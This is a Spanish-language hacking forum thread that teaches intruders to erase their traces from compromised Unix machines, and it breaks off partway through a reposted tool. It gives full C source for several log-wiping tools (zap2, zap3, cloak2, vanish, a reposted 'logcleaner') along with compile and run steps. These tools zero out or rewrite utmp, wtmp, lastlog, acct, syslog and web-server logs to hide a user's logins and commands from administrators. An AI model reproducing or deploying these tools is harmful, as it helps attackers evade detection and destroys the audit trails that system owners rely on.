Borrando Huellas [Zappering o Cloakering]

Iniciado por ANTRAX, Febrero 19, 2010, 07:59:09 AM

Tema anterior - Siguiente tema

0 Miembros y 3 Visitantes están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Febrero 19, 2010, 07:59:09 AM
Esto lo vamos a hacer con un zapper , un zapper es un programa que al ejecutarlo en la maquina remota limpia el log que queda guandado con todo lo que hicimos en la maquina victima.

Si no limpias la mugre que dejas estas cagado, ya ke si el root revisa los logs vera tu IP y todo lo ke has hecho. Si te agarran despues no me digas que no avise.

Pero donde esta el probema de esto, y bueno les comento que el problema de esto es que para borrar lo que hiciste tenes que ser roort.

Los logs mas importantes son:

_ UTMP - Indika quien esta konectado en cada momento.

_ WTMP - Indica todas las entradas y salidas de la maquina victima indicando el tty y el host.

_ LASTLOG - Guarda un log indicando el momento exacto en el ce se konekto el usuario por ultima vez.

_ ACCT - Guarda todos los comandos ejekutados por los usuarios (aunke sin argumentos) y como los ponemos.

Me llevo casi 3 horas averiguar esto asi que me imagino que algun dia lo van a utilizar, si es que entran en algun ordenador alguna vez.

Estos logs estan ubicados en los siguientes directorios.

_ UTMP : /etc o /var/adm o /usr/adm o /usr/var/adm o /var/log

_ WTMP : /etc o /var/adm o /usr/adm o /usr/var/adm o /var/log

_ LASTLOG : /usr/var/adm o /usr/adm o /var/adm o /var/log

_ ACCT : /var/adm/acct (en algunos sistemas se puede llamar pacct)

Esto varia de sistema en sistema.

Los zappers lo que hacen la mayoria es borrar el log acct , de esta forma estamos salvados de que nos agarren ya que sabran que estubimos dentro pero no pueden saber que hicimos. Por eso es bueno acompañarlo con algun metodo de anonimato que ya sabran.

Lo que voy a enseñar a usar es el zap2 un zapper que es muy fasil de detectar si es que se quiere, lo que hace este no borrar los logs sino dejarlos en 0 , y tampoco borra el acct pero tambien lo deja en 0 asi que no tendremos problemas graves, siempre y cuando no se manden una cagada grosa en la maquina y le den ganas al admin de saber quien fue. Le va a costar pero no va a ser tan fasil como dejarle el numero de documento en el log.

En este tuto vamos a matar 2 pajaros de un tiro. Uno es aprender a compilar exploits y otro aprender a ejecutarlos. Obvio que este es de uso local, es decir hay que ejecutarlo desde la shell del sistema que queremos limpiar.

Pasamos a crear el archivo zap2.c de esta forma.

[root@localhost phantomlord]# cat > zap2.c

------------------------copiamos el code-------------------------

#include <sys/types.h>

#include <stdio.h>

#include <unistd.h>

#include <sys/file.h>

#include <fcntl.h>

#include <utmp.h>

#include <pwd.h>

#include <lastlog.h>

#define WTMP_NAME "/usr/adm/wtmp"

#define UTMP_NAME "/etc/utmp"

#define LASTLOG_NAME "/usr/adm/lastlog"

int f;

void kill_utmp(who)

char *who;

{

struct utmp utmp_ent;

if ((f=open(UTMP_NAME,O_RDWR))>=0) {

while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )

if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {

bzero((char *)&utmp_ent,sizeof( utmp_ent ));

lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);

write (f, &utmp_ent, sizeof (utmp_ent));

}

close(f);

}

}

void kill_wtmp(who)

char *who;

{

struct utmp utmp_ent;

long pos;

pos = 1L;

if ((f=open(WTMP_NAME,O_RDWR))>=0) {

while(pos != -1L) {

lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);

if (read (f, &utmp_ent, sizeof (struct utmp))<0) {

pos = -1L;

} else {

if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {

bzero((char *)&utmp_ent,sizeof(struct utmp ));

lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);

write (f, &utmp_ent, sizeof (utmp_ent));

pos = -1L;

} else pos += 1L;

}

}

close(f);

}

}

void kill_lastlog(who)

char *who;

{

struct passwd *pwd;

struct lastlog newll;

if ((pwd=getpwnam(who))!=NULL) {

if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {

lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);

bzero((char *)&newll,sizeof( newll ));

write(f, (char *)&newll, sizeof( newll ));

close(f);

}

} else printf("%s: ?\n",who);

}

main(argc,argv)

int argc;

char *argv[];

{

if (argc==2) {

kill_lastlog(argv[1]);

kill_wtmp(argv[1]);

kill_utmp(argv[1]);

printf("Zap2!\n");

} else


printf("Listo...ya limpie la mie**a...hdl rulez!\n");

}

--------------------------------------termino zap2-------------------

apretamos ctrl +z para terminar

[15]+ Stopped cat >zap2.c

[root@localhost phantomlord]#

Ahora lo compilamos

[root@localhost phantomlord]# gcc zap2.c -o zap2

El archivo compilado (programa) se va a llamar zap2

y ahora lo ejecutamos de esta manera.

[root@localhost phantomlord]# ./zap2

Listo...ya limpie la mie**a...hdl rulez!

[root@localhost phantomlord]#

Como ven nos avisa si funciono o no quiero aclarar que se puede usar de las siguientes formas.

[root@localhost phantomlord]# ./zap2 nombreusuario

o simplemente

[root@localhost phantomlord]# ./zap2

Que borrara los logs del usuario que estemos usando en ese momento.


         ANTRAX

Febrero 19, 2010, 08:11:21 AM #1
Aqui mas zappers

zap3.c
Código: php
/*########################################################################
*####  Zap3.c cleans WTMP, UTMP, lastlog, messages, secure, ##############
*####  xferlog, httpd.access_log, httpd.error_log.          ##############
*####  Check your log file and edit the source accordingly. ##############
 ####      Tested in Mandrake 7.2 and 8.0                   ##############
*#########################################################################
*#### This program is for educational purposes only         ############## 
*####     I'm not responsible any  damages of this program  ##############
*####            Use it with your own risk                  ##############
*#########################################################################
*####  I change the user based cleaning method              ##############  
*####    to host based method. Also zap2.c cleans           ##############
*####        last entry of wtmp file,i change               ##############
*####           this to clean all entries.                  ##############
*######################################################################### 
        
               Copyright (c) darkloop .  All rights reserved.  
        This software is licensed pursuant to the GNU General Public License 
        version 2 or later versions [or GNU Lesser General Public License],
	a copy of which may be viewed at www.gnu.org/copyleft/gpl.html.

*#########################################################################
*####   Please inform me about your comments.               ##############
*####   I'm new to c programmin so feel free to flame :)    ##############
*####            [email protected]                     ##############  
*####            www.solitude2000.f2s.com                   ##############
*####              15.10.2001                             ##############
*#########################################################################
  
            



*/
#include <sys/types.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/file.h>
#include <fcntl.h>
#include <utmp.h>
#include <pwd.h>
#include <lastlog.h>
#include <string.h>
#define WTMP_NAME       "/var/log/wtmp"      
#define UTMP_NAME       "/var/run/utmp"     
#define LASTLOG_NAME    "/var/log/lastlog"
#define MESSAGES        "/var/log/messages"
#define SECURE          "/var/log/secure"
#define SYSLOG          "/var/log/syslog"
#define XFERLOG         "/var/log/xferlog"
#define AUTH            "/var/log/auth.log"
#define HTTPDA          "/var/log/httpd/access_log"
#define HTTPDE          "/var/log/httpd/error_log"         
#define MAX           1024*5120
#define MIN           1024              
void clean_logs(char *host,char *fake);		   
void clean_utmp(char *host,char *fake);
void clean_wtmp(char *host,char *fake);
void clean_lastlog(char *host,char *fake);
int pos(char *source,char *pattern);
void str_replace(char *source,char *pattern,char *replace);

main(int argc,char **argv)
{
    time_t t1,t2;
    if (argc<2) {
           printf("missing argument\n");
	     printf("usage :./zap <ip>\n");
           exit(1);
    } else {
	     time(&t1);
             clean_utmp(argv[1],argv[2]);
             clean_wtmp(argv[1],argv[2]);
             clean_lastlog(argv[1],argv[2]);
	     clean_logs(argv[1],argv[2]);
	     time(&t2);
	     printf("the process time is %d ms\n",t2-t1);
    }
}

void clean_utmp(char *host,char *fake)
{
     int f;
     struct utmp utmp_ent;
     if ((f=open(UTMP_NAME,O_RDWR))<0) {
	     perror("open");
	     close(f);
        }
     while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
       if (!strncmp(utmp_ent.ut_host,host,strlen(host))) {
	       if(fake) {
		       memcpy(utmp_ent.ut_host,fake,sizeof(utmp_ent.ut_host));
	       }else {
                 memset(&utmp_ent,0,sizeof( utmp_ent ));
		 }
                 lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
                 write (f, &utmp_ent, sizeof (utmp_ent));
            }
     close(f);
     printf("\tcleaning utmp file finished\n\t");
  
}
 
void clean_wtmp(char *host,char *fake)
{
    struct utmp utmp_ent;
    int f;
        if ((f=open(WTMP_NAME,O_RDWR))<0) {
		perror("open");
		close(f);
         }      
     while(read (f, &utmp_ent, sizeof (struct utmp))>0) {
          if (!strncmp(utmp_ent.ut_host,host,strlen(host))) {
		  if(fake) {
			  memcpy(utmp_ent.ut_host,fake,sizeof(utmp_ent.ut_host));
		  }else {
               memset(&utmp_ent,0,sizeof(struct utmp ));
		  }
               lseek(f,-(sizeof(struct utmp)),SEEK_CUR);
               write (f, &utmp_ent, sizeof( utmp_ent ));
            } 
        }
     close(f);
     printf("cleaning wtmp finished\n\t");
}
void clean_lastlog(char *host,char *fake)
{   
    int f;
    struct lastlog newll;
        if ((f=open(LASTLOG_NAME, O_RDWR)) < 0) {
		perror("open");
		close(f);
         } else {
               while(read(f,&newll,sizeof(struct lastlog)) > 0 ) { 
                 if(!strncmp(newll.ll_host,host,strlen(host))) {
			 if(fake) {
				 memcpy(newll.ll_host,fake,sizeof(newll.ll_host));
			 }else {
                   memset(&newll,0,sizeof( newll ));
			 }
                   lseek(f, -( sizeof (struct lastlog)),SEEK_CUR);
                   write(f,&newll, sizeof( newll ));
               }
          }
        close(f);
      }
    printf("cleaning lastlog finished\n\t"); 
}
void clean_logs(char *host,char *fake)
{
	int i;
	char buffer[MIN],buff[MAX];
	FILE *fin,*fout;
	char *logs[] = {MESSAGES, SECURE,SYSLOG, XFERLOG, AUTH, HTTPDA, HTTPDE} ;
        char *modlogs[] = {"modMESSAGES", "modSECURE","modSYSLOG", "modXFERLOG",
		"modAUTH","modHTTPDA","modHTTPDE"} ;
	
     	i=0;
	while(i<7) {
		printf("cleaning %s\n\t",logs[i]);
                strcpy(buff,"");
		if((fin=fopen(logs[i],"r"))==NULL 
				|| (fout=fopen(modlogs[i],"w"))==NULL) {
			perror("fopen");
			fclose(fin);
		        i++;
		}
        
		while(fgets(buffer,MIN,fin) !=NULL) {
			   if(fake) { 
		                      if (strstr(buffer,host) ) {
			                 str_replace(buffer,host,fake);
			                 fputs(buffer,fout); 
                                      }else
					      fputs(buffer,fout);
			   }else {
				   if(!strstr(buffer,host))
					   fputs(buffer,fout);
			   }
		}
	    fclose(fin);
	    fclose(fout);
            if((fout=fopen(logs[i],"w"))==NULL 
	                   || (fin=fopen(modlogs[i],"r"))==NULL) {
		    perror("fopen");
		    fclose(fout);
	    }
	    while((fgets(buffer,MAX,fin)) !=NULL) {
		    fputs(buffer,fout);
	    }
            fclose(fin);           
            fclose(fout);
	    unlink(modlogs[i]);
            i++;
	}
	printf("cleaning logs file finished\n\t"); 
}
void str_replace(char *source,char *pattern,char *replace)
{
      char buffer[MIN];
      char part[MIN];
      int n;
      while((n=pos(source,pattern))>=0) {
                  strcpy(buffer,&source[n+strlen(pattern)]);
                  strcpy(&source[n],replace);
                  strncpy(part,source,n+strlen(replace));
                  part[n+strlen(replace)]='\0';
                  strcat(part,buffer);
                  strcpy(source,part);
                  n=pos(source,pattern);
             }  
}
int pos(char *source,char *pattern)
{
    char substring[MIN];
    int i=0,found=0,position;
    int pattern_len=strlen(pattern);
    while(!found && i<= strlen(source) - pattern_len) {
         strncpy(substring,&source[i],pattern_len);
         substring[pattern_len]='\0';
         if(strcmp(substring,pattern)==0)
              found=1;
         else
             ++i;
        }
     if(found)
           position=i;
      else 
           position=-1;
      return(position);
}


------------------------------------------------------------------------------------------------------

cloak2.c     < Muy bueno y famoso

Código: php
/*
 *      C L O A K
 *
 *      Wrap yourself in a cloak of darkness (heh heh heh).
 *
 *      Michael S. Baldwin,  Matthew Diaz  1982
 *
 *      Marcus J. Ranum - 1983 - complete re-write and munging
 *      added more options, and all kinds of evil - including the
 *      ability to vanish from wtmp and acct as well as utmp. Added more
 *      error checking and useful command syntax. Now you can attribute
 *      all *YOUR* CPU usage to others when playing hack !!!
 *
 */
 
 
#include <stdio.h>
#include <sys/types.h>
#include <utmp.h>
#include <pwd.h>
#include <lastlog.h>
#include <sys/file.h>
#include <sys/acct.h>
 
/* set these guys. If you're sysV a port should be easy */
#define UTMP    "/etc/utmp"
#define WTMP    "/usr/adm/wtmp"
#define LAST    "/usr/adm/lastlog"
#define ACCT    "/usr/adm/acct"
 
 
main(ac,av)
int     ac;
char    *av[];
{
        char    *tp     = "";
        char    *un     = "";
        char    *hn     = "";
        char    *pn     = "";
        long    newt    = 0L;
        int     wflg    = 0;
        int     aflg    = 0;
        int     refs    = 1;
        int     x;              /* klunch */
        char    *p;
        extern  char    *index();
        extern  time_t  time();
 
        for(x = 1; x < ac; x++) {
                if(av[x][0] == '-')
                        switch(av[x][1]) {
			case 'u':       /* username to be :-) */
                                        if((x + 1) < ac)
                                                un = av[++x];
                                        break;
 
				      case 't':       /* tty slot to be on :-) */
                                        if((x + 1) < ac)
                                                tp = av[++x];
                                        break;
 
				      case 'h':       /* host name to be on :-) */
                                        if((x + 1) < ac)
                                                hn = av[++x];
                                        break;
 
				      case 'r':       /* # of refs to zap :-) */
                                        if((x + 1) < ac)
                                                refs = atoi(av[++x]);
                                        break;
 
				      case 's':
                                        execl("/bin/sh","sh",0);
                                        perror("exec");
                                        exit(1);
 
				      case 'w':       /* vanish from wtmp, too */
                                        wflg++;
                                        break;
 
				      case 'a':       /* vanish from acct, too */
                                        aflg++;
                                        break;
 
				      case 'p':       /* specific program for acct */
                                        if((x + 1) < ac)
                                                pn = av[++x];
                                        break;
 
				      case 'l':       /* log on time */
                                        if((x + 1) >= ac)
                                                break;
                                        newt = atoi(p = av[++x]);
                                        if(p = index(p,':'))  {
                                                newt *= 60;
                                                newt += ((newt > 0) ? 1 : -1) *
atoi(++p);
					      }
                                        newt *= 60;
                                        newt += time((long *)0L);
                                        break;
 
				      default:
                                        exit(usage());
				      }
 
	      }
 
        if(wflg && wtmpzap(tp,un,hn,newt,refs))
                perror(av[0]);
 
        if(aflg && acctzap(un,pn))
                perror(av[0]);
 
        if(utmpzap(tp,un,hn,newt)) {
                perror(av[0]);
                exit(1);
	      }
 
        if(lastzap(tp,un,hn,newt)) {
                perror(av[0]);
                exit(1);
	      }
 
        exit(0);
      }
 
utmpzap(tt,un,hn,tim)
char    *tt;
char    *un;
char    *hn;
long    tim;
{
        int     fd;
        int     slot;
        struct  utmp    ubuf;
        extern  time_t  time();
        extern  char    *strncpy();
        extern  long    lseek();
 
        if((slot = ttyslot()) == 0) {
                (void)fprintf(stderr,"No tty slot");
                return(-1);
	      }
 
        if((fd = open(UTMP,O_RDWR)) == -1 )
                return(-1);
 
        if(lseek(fd,(long)(slot * sizeof(ubuf)),0) < 0) {
                (void)close(fd);
                return(-1);
	      }
 
        if(read(fd,(char *)&ubuf,sizeof(ubuf)) != sizeof(ubuf)) {
                (void)close(fd);
                return(-1);
	      }
 
        if(tim)
                ubuf.ut_time = tim;
        else
                ubuf.ut_time = time((long *)0L);
 
        (void)strncpy(ubuf.ut_name,un,sizeof(ubuf.ut_name));
 
        if(!tt[0] == '\0')
                (void)strncpy(ubuf.ut_line,tt,sizeof(ubuf.ut_line));
                (void)strncpy(ubuf.ut_host,hn,sizeof(ubuf.ut_host));
 
        if(lseek(fd,(long)(-sizeof(ubuf)), 1) < 0) {
                (void)close(fd);
                return(-1);
	      }
 
        if(write(fd,(char *)&ubuf,sizeof(ubuf)) != sizeof(ubuf)) {
                (void)close(fd);
                return(-1);
	      }
 
        return(close(fd));
      }
 
wtmpzap(tt,un,hn,tim,refs)
char    *tt;
char    *un;
char    *hn;
long    tim;
int     refs;
{
        int     fd;
        char    *p;
        char    tbuf[40];
        struct  utmp    ubuf;
        extern  char    *strncpy();
        extern  char    *strcpy();
        extern  char    *rindex();
        extern  char    *ttyname();
        extern  long    lseek();
        extern  time_t  time();
 
        if((p = ttyname(0)) != NULL)
                (void)strcpy(tbuf,p);
        else
                return(0);
 
        /* figure out our device name */
        p = rindex(tbuf,'/');
        if(p == NULL)
                p = tbuf;
        else
                p++;
 
 
        if((fd = open(WTMP,O_RDWR)) == -1 )
                return(-1);
 
        if(lseek(fd,0L,2) < 0)
                return(-1);
 
 
        /* this is gross, but I haven't a better idea how it can */
        /* be done - so who cares ? */
 
        while(refs) {
                if((lseek(fd,(long)(-sizeof(ubuf)),1)) < 0) {
                        (void)close(fd);
                        return(0);
		      }
 
                if(read(fd,(char *)&ubuf,sizeof(ubuf)) != sizeof(ubuf)) {
                        (void)close(fd);
                        return(0);
		      }
                if(!strcmp(p,ubuf.ut_line)) {
                        if(tim)
                                ubuf.ut_time = tim;
                        else
                                ubuf.ut_time = time((long *)0L);
 
                        (void)strncpy(ubuf.ut_name,un,sizeof(ubuf.ut_name));
                        (void)strncpy(ubuf.ut_host,hn,sizeof(ubuf.ut_host));
 
                        if(!tt[0] == '\0')
 
(void)strncpy(ubuf.ut_line,tt,sizeof(ubuf.ut_line));
 
                        if(lseek(fd,(long)(-sizeof(ubuf)),1) < 0) {
                                (void)close(fd);
                                return(0);
			      }
 
                        if(write(fd,(char *)&ubuf,sizeof(ubuf)) !=
sizeof(ubuf)){
                                (void)close(fd);
                                return(0);
			      }
 
                        if(lseek(fd,(long)(-sizeof(ubuf)),1) < 0) {
                                (void)close(fd);
                                return(0);
			      }
 
                        refs--;
   }
 
                if(lseek(fd,(long)(-sizeof(ubuf)),1) < 0) {
                        (void)close(fd);
                        return(0);
   }
 
   }
 
        return(close(fd));
   }
 
acctzap(un,pn)
char    *un;
char    *pn;
{
        int     fd;
        int     faku =0;
        int     realu;
        struct  acct    actbuf;
        struct  passwd  *pwt;
        extern  struct  passwd  *getpwnam();
 
        if((fd = open(ACCT,O_RDWR)) == -1 )
                return(-1);
 
        realu = getuid();
 
        if(un[0] != '\0' && ((pwt = getpwnam(un)) != NULL))
                faku = pwt->pw_uid;
 
        while(1) {
                if(read(fd,(char *)&actbuf,sizeof(actbuf)) != sizeof(actbuf)) {
                        (void)close(fd);
                        return(0);
		      }
 
                if(realu == actbuf.ac_uid) {
 
                        /* only zap a specific program to user */
                        if(pn[0] != '\0' && strcmp(pn,actbuf.ac_comm))
                                continue;
 
                        actbuf.ac_uid = faku;
                        actbuf.ac_flag &= ~ASU;
                        if(lseek(fd,(long)(-sizeof(actbuf)),1) < 0) {
                                (void)close(fd);
                                return(0);
			      }
 
                        if(write(fd,(char *)&actbuf,sizeof(actbuf)) !=
sizeof(actbuf)){
                                (void)close(fd);
                                return(0);
			      }
		      }
	      }
      }
 
usage()
{
#ifdef USAGE
        (void)fprintf(stderr,"usage: cloak <options>\n");
        (void)fprintf(stderr,"options are:\t-l <+->hh:mm (login time)\n");
        (void)fprintf(stderr,"\t\t-u username\t\t\t-t ttyname\n");
        (void)fprintf(stderr,"\t\t-w (clobber wtmp)\t\t-r #of refs to
clobber\n");
        (void)fprintf(stderr,"\t\t-h host\t\t-a (clobber accounting)\n");
        (void)fprintf(stderr,"\t\t-p program (attribute only program to
acct)\n");
        (void)fprintf(stderr,"(no args causes a simple vanishing act)\n");
#endif
        return(1);
      }
 
lastzap(tt,un,hn,tim)
char    *tt;
char    *un;
char    *hn;
long    tim;
{
        int     fd;
        int     uid;
        struct  lastlog lbuf;
        extern  time_t  time();
        extern  char    *strncpy();
        extern  long    lseek();
 
        uid = getuid();
 
        if((fd = open(LAST,O_RDWR)) == -1 )
                return(-1);
 
        if(lseek(fd,(long)(uid * sizeof(lbuf)),0) < 0) {
                (void)close(fd);
                return(-1);
	      }
 
        if(read(fd,(char *)&lbuf,sizeof(lbuf)) != sizeof(lbuf)) {
                (void)close(fd);
                return(-1);
	      }
 
        if(tim)
                lbuf.ll_time = tim;
        else
                lbuf.ll_time = time((long *)0L);
 
        if(!tt[0] == '\0')
                (void)strncpy(lbuf.ll_line,tt,sizeof(lbuf.ll_line));
        (void)strncpy(lbuf.ll_host,hn,sizeof(lbuf.ll_host));
 
        if(lseek(fd,(long)(-sizeof(lbuf)), 1) < 0) {
                (void)close(fd);
                return(-1);
	      }
 
        if(write(fd,(char *)&lbuf,sizeof(lbuf)) != sizeof(lbuf)) {
                (void)close(fd);
                return(-1);
	      }
 
        return(close(fd));
      }


--------------------------------------------------------------------------------------------------

vanish.c

Código: php
/***************************************************************************
                          vanish.c  -  description                           
                            -------------------                           
                  begin                : Wed Feb 2 2000                       
                  copyright            : (C) 2000 by Neo the Hacker     
                  email                : --------------------------     
                             
***************************************************************************/

/***************************************************************************
* Vanish.c cleans WTMP, UTMP, lastlog, messages, secure, xferlog, maillog, *
* warn, mail, httpd.access_log, httpd.error_log. Use your brain, check your*
* logs and edit accordingly !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!*
****************************************************************************
* Warning!! This programm is for educational purpouse only! I am not       *
* responsible to anything you do with this !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!*
****************************************************************************
* Code written for Unix like systems! Tested on SuSE-Linux 6.2 !           *
* Compile like: gcc vanish.c -o vanish                                     *
***************************************************************************/


#include <stdio.h>
#include <fcntl.h>		
#include <utmp.h>		
#include <sys/types.h>		
#include <unistd.h>
#include <lastlog.h>
#include <pwd.h>

#define UTMP            "/var/run/utmp"
#define WTMP            "/var/log/wtmp"
#define LASTLOG         "/var/log/lastlog"
#define MESSAGES        "/var/log/messages"
#define SECURE          "/var/log/secure"
#define XFERLOG         "/var/log/xferlog"
#define MAILLOG         "/var/log/maillog"     
#define WARN            "/var/log/warn"
#define MAIL            "/var/log/mail"
#define HTTPDA          "/var/log/httpd.access_log"
#define HTTPDE          "/var/log/httpd.error_log"
#define MAXBUFF		8*1024



int main(int argc, char *argv[])
{
struct utmp ut ;		
struct lastlog ll ;		
struct passwd *pass ;
int i, size, fin, fout ;
FILE *pfile;
FILE *pfile2;
char *varlogs[] = {MESSAGES, SECURE, XFERLOG, MAILLOG, WARN, MAIL, HTTPDA,HTTPDE} ; 
char *newlogs[] = {"messages.hm", "secure.hm","xferlog.hm","maillog.hm","warn.hm", "mail.hm", "httpda.hm", "httpde.hm"} ;  
char buffer[MAXBUFF] ;

char user[10] ;		
char host[100] ;		
char host_ip[17] ;


/*Usage of the programm*/
if (argc!=4)
{
   printf ("\n\n");
   fprintf(stderr, "Vanish by Neo the Hacker\n");
   fprintf(stderr, "Usage: %s <user> <host> <IP>\n\n",argv[0]) ;
   exit () ;
}

/***************************
* OK Let's start with UTMP *
***************************/
size = sizeof(ut) ;
strcpy (user, argv[1]) ;
fin = open (UTMP, O_RDWR) ;
if (fin < 0)
{
fprintf(stderr, "\nFucking shit!! Utmp permission denied.Getting outta here!!\n");  
close (fin) ;
exit();
}
else
{
while (read (fin, &ut, size) == size) {
       if (!strncmp(ut.ut_user, user, strlen(user))) {
                   memset(&ut, 0, size);
                   lseek(fin, -1*size, SEEK_CUR);
                   write (fin, &ut, size);
               }
        }
        close (fin);
        printf("\nutmp target processed.");
}
/***************************
* OK Let's go on with WTMP *
***************************/
	strcpy (host, argv[2]) ;
  strcpy(host_ip, argv[3]) ;
	
	fin = open(WTMP, O_RDONLY) ;
	if (fin < 0) {
		fprintf(stderr, "\nFucking shit!! Wtmp permission denied.Getting outta here.\n") ; 		                              
   close (fin) ; 		exit () ;
	}
	fout = open("wtmp.hm", O_WRONLY|O_CREAT) ;
	if (fout < 0) {
		fprintf(stderr, "\nDamn! Problems targeting wtmp. Getting outta here.\n") ;	
		close (fout) ;
		exit () ;
	}
	else {
		while (read (fin, &ut, size) == size) {
			if ( (!strcmp(ut.ut_user, user)) || (!strncmp(ut.ut_host, host, strlen(host))) ) {
 		 	/* let it go into oblivion */  ; 	
	} 			
        else write (fout, &ut, size) ; 		}
		close (fin) ;
		close (fout) ;
		if ((system("/bin/mv wtmp.hm /var/log/wtmp") < 0) &&
		    (system("/bin/mv wtmp.hm /var/log/wtmp") == 127)) {
			fprintf(stderr, "\nAch. Couldn't replace %s .", WTMP) ;
		}
                system("/bin/chmod 644 /var/log/wtmp") ;
		printf("\nwtmp target processed.") ;
	}
/***************************
* OK Let's look at LASTLOG *
***************************/
	size = sizeof(ll) ;
	fin = open(LASTLOG, O_RDWR) ;
	if (fin < 0) {
		fprintf(stderr, "\nFucking shit!! Lastlog permission denied.Getting outta here.\n") ; 		
                close (fin) ;
		exit () ;
	}
	else {
		pass = getpwnam(user) ;
		lseek(fin, size*pass->pw_uid, SEEK_SET) ;
		read(fin, &ll, size) ;
		ll.ll_time = 0 ;
		strncpy (ll.ll_line, "      ", 5) ;
		strcpy (ll.ll_host, " ") ;
		lseek(fin, size*pass->pw_uid, SEEK_SET) ;
		write(fin, &ll, size) ;
		close (fin) ;
		printf("\nlastlog target processed.\n") ;
	}

/**************************
* OK moving to /var ....  *
**************************/
i=0;
while (i<8) {
printf("Processing %s\t", varlogs[i]) ;
pfile = fopen (varlogs[i],"r");
if (!pfile)
{
   printf("Couldn't open %s\n\n", varlogs[i]);
   i++;
   continue ;
}


pfile2 = fopen (newlogs[i],"w");
if (!pfile2)
{
  printf("Couldn't create backup file! You have to have write permission to the folder!! %s \n\n", newlogs[i]);   
  i++;   
  continue;
}
else {
      while (fgets(buffer, MAXBUFF, pfile) != NULL) {
      if ((!strstr(buffer, user)) && (!strstr(buffer, host))&&(!strstr(buffer, host_ip)))  { 			
fputs(buffer,pfile2) ;  } }
}
fclose (pfile);
fclose (pfile2);
printf ("                   DONE.\n");
i++;
}
printf ("\n\n");
system ("mv messages.hm /var/log/messages");
system ("mv secure.hm /var/log/secure");
system ("mv xferlog.hm /var/log/xferlog");
system ("mv maillog.hm /var/log/maillog");
system ("mv warn.hm /var/log/warn");
system ("mv mail.hm /var/log/mail");
system ("mv httpda.hm /var/log/httpd.access_log");
system ("mv httpde.hm /var/log/httpd.error_log");
printf ("\n\n");
printf ("V_A_N_I_S_H_E_D_!\n");
printf ("Your tracks have been removed\n");
printf ("Exiting programm !!\n\n");
exit();
}

Marzo 04, 2010, 07:22:36 AM #2
tienes algunos para sistemas operativos windows ???
Marzo 05, 2010, 09:38:15 AM #3
En windows se puede hacer uno en Batch, voy a ver si me hecho un tiempito para codear uno

Marzo 25, 2010, 05:38:15 PM #4
exelente info  :D

grax ANTRAX

saludos

m3x1c0h4ck
Marzo 25, 2010, 05:44:15 PM #5
perfecto ,  te quedo bastante completo , gracias por la infromacion
Marzo 27, 2010, 09:39:40 PM #6
logcleaner-0.3.c

Código: php
/*########################################################################
*####  Zap3.c cleans WTMP, UTMP, lastlog, messages, secure, ##############
*####  xferlog, httpd.access_log, httpd.error_log.          ##############
*####  Check your log file and edit the source accordingly. ##############
 ####      Tested in Mandrake 7.2 and 8.0                   ##############
*#########################################################################
*#### This program is for educational purposes only         ############## 
*####     I'm not responsible any  damages of this program  ##############
*####            Use it with your own risk                  ##############
*#########################################################################
*####  I change the user based cleaning method              ##############  
*####    to host based method. Also zap2.c cleans           ##############
*####        last entry of wtmp file,i change               ##############
*####           this to clean all entries.                  ##############
*######################################################################### 
        
               Copyright (c) darkloop .  All rights reserved.  
        This software is licensed pursuant to the GNU General Public License 
        version 2 or later versions [or GNU Lesser General Public License],
	a copy of which may be viewed at www.gnu.org/copyleft/gpl.html.

*#########################################################################
*####   Please inform me about your comments.               ##############
*####   I'm new to c programmin so feel free to flame :)    ##############
*####            [email protected]                     ##############  
*####            www.solitude2000.f2s.com                   ##############
*####              15.10.2001                             ##############
*#########################################################################
  
            



*/
#include <sys/types.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/file.h>
#include <fcntl.h>
#include <utmp.h>
#include <pwd.h>
#include <lastlog.h>
#include <string.h>
#define WTMP_NAME       "/var/log/wtmp"      
#define UTMP_NAME       "/var/run/utmp"     
#define LASTLOG_NAME    "/var/log/lastlog"
#define MESSAGES        "/var/log/messages"
#define SECURE          "/var/log/secure"
#define SYSLOG          "/var/log/syslog"
#define XFERLOG         "/var/log/xferlog"
#define AUTH            "/var/log/auth.log"
#define HTTPDA          "/var/log/httpd/access_log"
#define HTTPDE          "/var/log/httpd/error_log"         
#define MAX           1024*5120
#define MIN           1024              
void clean_logs(char *host,char *fake);		   
void clean_utmp(char *host,char *fake);
void clean_wtmp(char *host,char *fake);
void clean_lastlog(char *host,char *fake);
int pos(char *source,char *pattern);
void str_replace(char *source,char *pattern,char *replace);

main(int argc,char **argv)
{
    time_t t1,t2;
    if (argc<2) {
           printf("missing argument\n");
	     printf("usage :./zap <ip>\n");
           exit(1);
    } else {
	     time(&t1);
             clean_utmp(argv[1],argv[2]);
             clean_wtmp(argv[1],argv[2]);
             clean_lastlog(argv[1],argv[2]);
	     clean_logs(argv[1],argv[2]);
	     time(&t2);
	     printf("the process time is %d ms\n",t2-t1);
    }
}

void clean_utmp(char *host,char *fake)
{
     int f;
     struct utmp utmp_ent;
     if ((f=open(UTMP_NAME,O_RDWR))<0) {
	     perror("open");
	     close(f);
        }
     while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
       if (!strncmp(utmp_ent.ut_host,host,strlen(host))) {
	       if(fake) {
		       memcpy(utmp_ent.ut_host,fake,sizeof(utmp_ent.ut_host));
	       }else {
                 memset(&utmp_ent,0,sizeof( utmp_ent ));
		 }
                 lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
                 write (f, &utmp_ent, sizeof (utmp_ent));
            }
     close(f);
     printf("\tcleaning utmp file finished\n\t");
  
}
 
void clean_wtmp(char *host,char *fake)
{
    struct utmp utmp_ent;
    int f;
        if ((f=open(WTMP_NAME,O_RDWR))<0) {
		perror("open");
		close(f);
         }      
     while(read (f, &utmp_ent, sizeof (struct utmp))>0) {
          if (!strncmp(utmp_ent.ut_host,host,strlen(host))) {
		  if(fake) {
			  memcpy(utmp_ent.ut_host,fake,sizeof(utmp_ent.ut_host));
		  }else {
